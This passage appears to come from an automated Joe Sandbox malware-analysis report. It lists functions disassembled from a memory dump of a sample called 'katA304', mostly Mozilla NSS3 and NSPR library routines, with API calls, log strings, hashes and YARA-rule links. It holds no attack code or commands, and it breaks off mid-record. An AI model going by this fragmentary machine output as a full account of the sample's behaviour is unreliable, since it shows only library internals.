                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
                                                            • API String ID: 1003633598-1777813432
                                                            • Opcode ID: 1540947196728cfab01870360cd7c849ed49d158a70ceaccf309af6021212e91
                                                            • Instruction ID: 59f7ad0b6e520b292a65e8ba734c2da647e9bd2f8178a011cc2e400956a5747e
                                                            • Opcode Fuzzy Hash: 1540947196728cfab01870360cd7c849ed49d158a70ceaccf309af6021212e91
                                                            • Instruction Fuzzy Hash: 453107756051A4ABEB008F15ED5DB6E3B79EB42358F084124E80DE7B92DB349888CBD2
                                                            Function 6CAD2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_initialize.NSS3 ref: 6CAD2D9F
                                                              • Part of subcall function 6C98CA30: EnterCriticalSection.KERNEL32(?,?,?,6C9EF9C9,?,6C9EF4DA,6C9EF9C9,?,?,6C9B369A), ref: 6C98CA7A
                                                              • Part of subcall function 6C98CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C98CB26
                                                            • sqlite3_exec.NSS3(?,?,6CAD2F70,?,?), ref: 6CAD2DF9
                                                            • sqlite3_free.NSS3(00000000), ref: 6CAD2E2C
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2E3A
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2E52
                                                            • sqlite3_mprintf.NSS3(6CB3AAF9,?), ref: 6CAD2E62
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2E70
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2E89
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2EBB
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2ECB
                                                            • sqlite3_free.NSS3(00000000), ref: 6CAD2F3E
                                                            • sqlite3_free.NSS3(?), ref: 6CAD2F4C
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                            • String ID:
                                                            • API String ID: 1957633107-0
                                                            • Opcode ID: f73c09d3f68938dd98760e9fc7c29911fe8cbe3b03278264a7d82bae2b1d1c37
                                                            • Instruction ID: 7de7330a26eafde2cae3e13490a1f32e6d5a99a4411b42fe49895ce32cf0fc9e
                                                            • Opcode Fuzzy Hash: f73c09d3f68938dd98760e9fc7c29911fe8cbe3b03278264a7d82bae2b1d1c37
                                                            • Instruction Fuzzy Hash: 70618EB5E012068BEB00CF68D884BDEBBB1AF58348F1A4524DC55A7701EB35FC95CBA1
                                                            Function 6CA22C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32(6CA23F23,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22C62
                                                            • EnterCriticalSection.KERNEL32(0000001C,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22C76
                                                            • PL_HashTableLookup.NSS3(00000000,?,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22C86
                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22C93
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22CC6
                                                            • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23,?), ref: 6CA22CDA
                                                            • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?,?,6CA23F23), ref: 6CA22CEA
                                                            • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?), ref: 6CA22CF7
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CA1E477,?,?,?,00000001,00000000,?), ref: 6CA22D4D
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA22D61
                                                            • PL_HashTableLookup.NSS3(?,?), ref: 6CA22D71
                                                            • PR_Unlock.NSS3(?), ref: 6CA22D7E
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07AD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07CD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07D6
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C98204A), ref: 6C9F07E4
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,6C98204A), ref: 6C9F0864
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C9F0880
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C98204A), ref: 6C9F08CB
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08D7
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08FB
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                            • String ID:
                                                            • API String ID: 2446853827-0
                                                            • Opcode ID: adbc1d97378e7fea7fef89fedd3f806fdfc940343ffd90b63392d29031bb9f48
                                                            • Instruction ID: e55b69f52f1d70eba5bdc411f3517b896a3555232ce6d33393ebe40852e3b1eb
                                                            • Opcode Fuzzy Hash: adbc1d97378e7fea7fef89fedd3f806fdfc940343ffd90b63392d29031bb9f48
                                                            • Instruction Fuzzy Hash: 4351FA76D00115ABEB009F24DC459AA7778FF19368B0C8624ED1897B11E731EDA9CBE1
                                                            Function 6CA17C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_CallOnce.NSS3(6CB62120,Function_00097E60,00000000,?,?,?,?,6CA9067D,6CA91C60,00000000), ref: 6CA17C81
                                                              • Part of subcall function 6C984C70: TlsGetValue.KERNEL32(?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984C97
                                                              • Part of subcall function 6C984C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CB0
                                                              • Part of subcall function 6C984C70: PR_Unlock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CC9
                                                            • TlsGetValue.KERNEL32 ref: 6CA17CA0
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA17CB4
                                                            • PR_Unlock.NSS3 ref: 6CA17CCF
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • TlsGetValue.KERNEL32 ref: 6CA17D04
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA17D1B
                                                            • realloc.MOZGLUE(-00000050), ref: 6CA17D82
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA17DF4
                                                            • PR_Unlock.NSS3 ref: 6CA17E0E
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
                                                            • String ID:
                                                            • API String ID: 2305085145-0
                                                            • Opcode ID: ab054cd47419bf94e802834933693010b67149544cc96676c1fe06e48d7e8278
                                                            • Instruction ID: 7b182c7db9829dbe92dbd656c550c7a41fd580079e0b8cff824ccdebed0cd3c5
                                                            • Opcode Fuzzy Hash: ab054cd47419bf94e802834933693010b67149544cc96676c1fe06e48d7e8278
                                                            • Instruction Fuzzy Hash: D451F071A8D1049FEF00AF29CC44A7537B6FB06318F195129ED04C7BA2EB30D8E5CA82
                                                            Function 6C984C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984C97
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CB0
                                                            • PR_Unlock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CC9
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984D11
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984D2A
                                                            • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984D4A
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984D57
                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984D97
                                                            • PR_Lock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984DBA
                                                            • PR_WaitCondVar.NSS3 ref: 6C984DD4
                                                            • PR_Unlock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984DE6
                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984DEF
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                            • String ID:
                                                            • API String ID: 3388019835-0
                                                            • Opcode ID: 9b343616d7d1512e5f04b0afc7c9f1589be3aa77877fc2a5347a4d1f0c9694c6
                                                            • Instruction ID: 4470e1c8846b6fd260b2b9db6921728bef68f0db34a12dba47a717ed8c337863
                                                            • Opcode Fuzzy Hash: 9b343616d7d1512e5f04b0afc7c9f1589be3aa77877fc2a5347a4d1f0c9694c6
                                                            • Instruction Fuzzy Hash: A9419DB5A06615CFCB00AF79C4945A9BBF8BF09314F054A69DC889B750E730E885CF82
                                                            Function 6CB17CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB17CE0
                                                              • Part of subcall function 6CAC9BF0: TlsGetValue.KERNEL32(?,?,?,6CB10A75), ref: 6CAC9C07
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB17D36
                                                            • PR_Realloc.NSS3(?,00000080), ref: 6CB17D6D
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB17D8B
                                                            • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CB17DC2
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB17DD8
                                                            • malloc.MOZGLUE(00000080), ref: 6CB17DF8
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB17E06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                            • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                            • API String ID: 530461531-3274975309
                                                            • Opcode ID: ba810d48dd33e1028e09e740554376ab35daa9f7993c438ae7a1df5d15ebbaa3
                                                            • Instruction ID: 0d173eb9356baf1a2a0cde671be682dcbf8b544a5cfec03503a6a19c8bed7bc4
                                                            • Opcode Fuzzy Hash: ba810d48dd33e1028e09e740554376ab35daa9f7993c438ae7a1df5d15ebbaa3
                                                            • Instruction Fuzzy Hash: EC4115B16142959FDB04CF28CD8096B3BA6FF84318B25456CE819ABF51D770E841CBA2
                                                            Function 6CA4ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CA4DE64), ref: 6CA4ED0C
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA4ED22
                                                              • Part of subcall function 6CA5B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB318D0,?), ref: 6CA5B095
                                                            • PL_FreeArenaPool.NSS3(?), ref: 6CA4ED4A
                                                            • PL_FinishArenaPool.NSS3(?), ref: 6CA4ED6B
                                                            • PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA4ED38
                                                              • Part of subcall function 6C984C70: TlsGetValue.KERNEL32(?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984C97
                                                              • Part of subcall function 6C984C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CB0
                                                              • Part of subcall function 6C984C70: PR_Unlock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CC9
                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CA4ED52
                                                            • PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA4ED83
                                                            • PL_FreeArenaPool.NSS3(?), ref: 6CA4ED95
                                                            • PL_FinishArenaPool.NSS3(?), ref: 6CA4ED9D
                                                              • Part of subcall function 6CA664F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CA6127C,00000000,00000000,00000000), ref: 6CA6650E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                            • String ID: security
                                                            • API String ID: 3323615905-3315324353
                                                            • Opcode ID: 830b14b4d44cb967b91c51245be9ea8fab426cccffc3c26960f5a8e64f3842c4
                                                            • Instruction ID: abac839d3fe5f343145f25f8317179d5c5d4e944b3638f52f25fdbe50cb73ee6
                                                            • Opcode Fuzzy Hash: 830b14b4d44cb967b91c51245be9ea8fab426cccffc3c26960f5a8e64f3842c4
                                                            • Instruction Fuzzy Hash: 74115C79A002146BE7109A26EE44BBBB37CAF4170DF044934E84563F81FB74A59CC6E7
                                                            Function 6CA32CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_InitToken), ref: 6CA32CEC
                                                            • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CA32D07
                                                              • Part of subcall function 6CB109D0: PR_Now.NSS3 ref: 6CB10A22
                                                              • Part of subcall function 6CB109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB10A35
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB10A66
                                                              • Part of subcall function 6CB109D0: PR_GetCurrentThread.NSS3 ref: 6CB10A70
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB10A9D
                                                              • Part of subcall function 6CB109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB10AC8
                                                              • Part of subcall function 6CB109D0: PR_vsmprintf.NSS3(?,?), ref: 6CB10AE8
                                                              • Part of subcall function 6CB109D0: EnterCriticalSection.KERNEL32(?), ref: 6CB10B19
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB10B48
                                                              • Part of subcall function 6CB109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB10C76
                                                              • Part of subcall function 6CB109D0: PR_LogFlush.NSS3 ref: 6CB10C7E
                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CA32D22
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(?), ref: 6CB10B88
                                                              • Part of subcall function 6CB109D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB10C5D
                                                              • Part of subcall function 6CB109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CB10C8D
                                                              • Part of subcall function 6CB109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB10C9C
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(?), ref: 6CB10CD1
                                                              • Part of subcall function 6CB109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB10CEC
                                                              • Part of subcall function 6CB109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB10CFB
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB10D16
                                                              • Part of subcall function 6CB109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CB10D26
                                                              • Part of subcall function 6CB109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB10D35
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CB10D65
                                                              • Part of subcall function 6CB109D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CB10D70
                                                              • Part of subcall function 6CB109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB10D90
                                                              • Part of subcall function 6CB109D0: free.MOZGLUE(00000000), ref: 6CB10D99
                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CA32D3B
                                                              • Part of subcall function 6CB109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CB10BAB
                                                              • Part of subcall function 6CB109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB10BBA
                                                              • Part of subcall function 6CB109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CB10D7E
                                                            • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CA32D54
                                                              • Part of subcall function 6CB109D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB10BCB
                                                              • Part of subcall function 6CB109D0: EnterCriticalSection.KERNEL32(?), ref: 6CB10BDE
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(?), ref: 6CB10C16
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                            • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                            • API String ID: 420000887-1567254798
                                                            • Opcode ID: 8dca61bb9f7405d3f27321a3e0542d22af069526c1ffafefa4e9c889581a4e2f
                                                            • Instruction ID: a17c2d6144076a4d6dd2fbe4152ade9d950522e8d30613909ff63a58333a927d
                                                            • Opcode Fuzzy Hash: 8dca61bb9f7405d3f27321a3e0542d22af069526c1ffafefa4e9c889581a4e2f
                                                            • Instruction Fuzzy Hash: 2521F875200190EFEB019F55ED6CA693BB5EB4239DF485110F50CD7A63DB34889CCBA2
                                                            Function 6CB10EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(Aborting,?,6C9F2357), ref: 6CB10EB8
                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C9F2357), ref: 6CB10EC0
                                                            • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CB10EE6
                                                              • Part of subcall function 6CB109D0: PR_Now.NSS3 ref: 6CB10A22
                                                              • Part of subcall function 6CB109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB10A35
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB10A66
                                                              • Part of subcall function 6CB109D0: PR_GetCurrentThread.NSS3 ref: 6CB10A70
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB10A9D
                                                              • Part of subcall function 6CB109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB10AC8
                                                              • Part of subcall function 6CB109D0: PR_vsmprintf.NSS3(?,?), ref: 6CB10AE8
                                                              • Part of subcall function 6CB109D0: EnterCriticalSection.KERNEL32(?), ref: 6CB10B19
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB10B48
                                                              • Part of subcall function 6CB109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB10C76
                                                              • Part of subcall function 6CB109D0: PR_LogFlush.NSS3 ref: 6CB10C7E
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CB10EFA
                                                              • Part of subcall function 6C9FAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C9FAF0E
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB10F16
                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB10F1C
                                                            • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB10F25
                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB10F2B
                                                            Strings
